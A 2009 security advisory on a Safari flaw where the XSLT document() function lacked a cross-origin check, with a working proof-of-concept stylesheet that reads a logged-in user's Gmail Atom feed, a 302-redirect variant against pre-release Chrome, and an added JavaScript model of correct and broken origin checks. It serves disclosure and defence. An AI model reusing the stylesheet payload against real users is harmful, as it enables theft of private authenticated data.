CESA-2009-008 - rev 1


[See all my vulnerabilities at http://scary.beasts.org/security]

[Blog if you want to subscribe to new findings is at http://scarybeastsecurity.blogspot.com/]

Apple Safari cross-domain XML theft



Programs affected: Safari prior to version 4. In addition, the "302 redirect trick" variant affected a pre-production version of Chrome.
Severity: A malicious website can steal any XML-formatted data cross-domain, including data that is only served to a logged-in user
Vendor URL (copy): APPLE-SA-2009-06-08-1
CVE: CVE-2009-1713, CVE-2009-1700
Initial report: Jun 2008

This bug is a missing cross-domain check in a relatively obscure feature that can fetch documents from arbitrary URLs. It is one of the bugs I demoed but did not disclose at PacSec and HiTB Dubai.

The feature in this case is the XSLT document() function, which loads an XML document from a URL and makes its contents available to the transform. Because the browser did not check that the URL was same-origin with the stylesheet, a transform served by an attacker could fetch XML from any site, with the victim's cookies attached, and read it. XML theft is unpleasant because very sensitive, authenticated data is routinely served as XML: Atom/RSS feeds, XML-formatted AJAX responses and XHTML versions of web apps.

Here's sample code for an evil XSL which abuses this function to steal inbox details from a logged-in Gmail session. The stylesheet is referenced from an attacker-hosted XML document via an xml-stylesheet processing instruction; the transform's output becomes the rendered page, so the fetched feed text lands in the attacker's DOM where script can read it:

<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:str="http://exslt.org/strings"
    extension-element-prefixes="str">
  <xsl:template match="*">
    <html>
      <body>
        Below, you should see e-mail stolen cross-domain!
        <p/>
        <!-- document() fetches the Atom feed with the victim's Gmail cookies;
             value-of dumps its text content (subjects, snippets) into the page -->
        <xsl:value-of select="document('https://mail.google.com/mail/feed/atom')"/>
        <!-- the stolen text is now in the attacker-controlled page, readable by script -->
        <script>
          alert(document.body.innerHTML)
        </script>
      </body>
    </html>
  </xsl:template>
</xsl:stylesheet>

A variant of this attack also affected a pre-production version of Chrome (long since fixed, prior to v1.0): the stylesheet asks document() for a same-origin URL on the attacker's server, which answers with a 302 redirect to the victim site. That fools a fix which judged the XML's domain by the URL the stylesheet requested rather than by the URL the XML was finally fetched from.
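To make the two failure modes concrete, here is an added JavaScript (Node) model of the origin check a browser's XSLT engine should apply to document() loads. It is not code from this advisory, nor from Safari or Chrome; the in-memory SAMPLE_SERVER table, the attacker.example host and the feed contents are constructed for the example. Policy 'none' is the Safari 3 behaviour (no check), 'initial' is a fix that checks only the URL the stylesheet asked for and is therefore fooled by the 302, and 'strict' checks every hop of the redirect chain before the request for it is made.

```javascript
// Added example, not from the advisory or from WebKit: a model of the
// origin check an XSLT engine should apply to document() loads, with the
// two broken policies the advisory describes alongside a correct one.
// SAMPLE_SERVER is a constructed in-memory table standing in for HTTP.

function originOf(urlString) {
  return new URL(urlString).origin;          // scheme://host[:port]
}

// Constructed responses keyed by absolute URL. A 302 carries a Location;
// anything else is a document body. The feed contents are made up.
const SAMPLE_SERVER = {
  'https://attacker.example/local.xml':
    { status: 200, body: '<data>public</data>' },
  'https://attacker.example/feed.xml':      // the "302 redirect trick"
    { status: 302, location: 'https://mail.google.com/mail/feed/atom' },
  'https://mail.google.com/mail/feed/atom':
    { status: 200, body: '<feed><entry><title>constructed secret</title></entry></feed>' },
};

// Fetch `url`, following redirects. `allowHop(url, hop)` is consulted before
// each request, so a refused hop is never fetched. Returns the URLs actually
// requested, the body (null if refused) and the URL that was refused.
function fetchChain(url, allowHop, server = SAMPLE_SERVER, maxHops = 5) {
  const chain = [];
  let current = url;
  for (let hop = 0; hop <= maxHops; hop++) {
    if (!allowHop(current, hop)) return { chain, body: null, blockedAt: current };
    chain.push(current);
    const resp = server[current];
    if (!resp) throw new Error(`no response for ${current}`);
    if (resp.status === 302) {
      current = new URL(resp.location, current).href;   // resolve relative Location
      continue;
    }
    return { chain, body: resp.body, blockedAt: null };
  }
  throw new Error('too many redirects');
}

// Resolve a document() argument against the stylesheet URL and load it under
// the named policy:
//   none    - no check at all (Safari 3)
//   initial - only the URL the stylesheet asked for is checked, so a
//             same-origin URL that 302s off-site slips through
//   strict  - every URL in the redirect chain must match the stylesheet origin
function xslDocument(stylesheetUrl, requestedUrl, policy, server = SAMPLE_SERVER) {
  const allowed = originOf(stylesheetUrl);
  const sameOrigin = (u) => originOf(u) === allowed;
  const policies = {
    none:    () => true,
    initial: (u, hop) => hop > 0 || sameOrigin(u),
    strict:  (u) => sameOrigin(u),
  };
  if (!(policy in policies)) throw new Error(`unknown policy ${policy}`);
  const resolved = new URL(requestedUrl, stylesheetUrl).href;
  return fetchChain(resolved, policies[policy], server);
}
```

Under 'strict', loading feed.xml from the attacker's stylesheet yields a chain of one URL and a null body: the redirect target is refused before the cross-origin request is made, so the victim's cookies are never sent. Under 'initial' the same load returns the feed, which is exactly the pre-release Chrome variant described above.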

Demo

Click here whilst logged into Gmail using Safari 3

Credits

Chris Evans
scarybeasts@gmail.com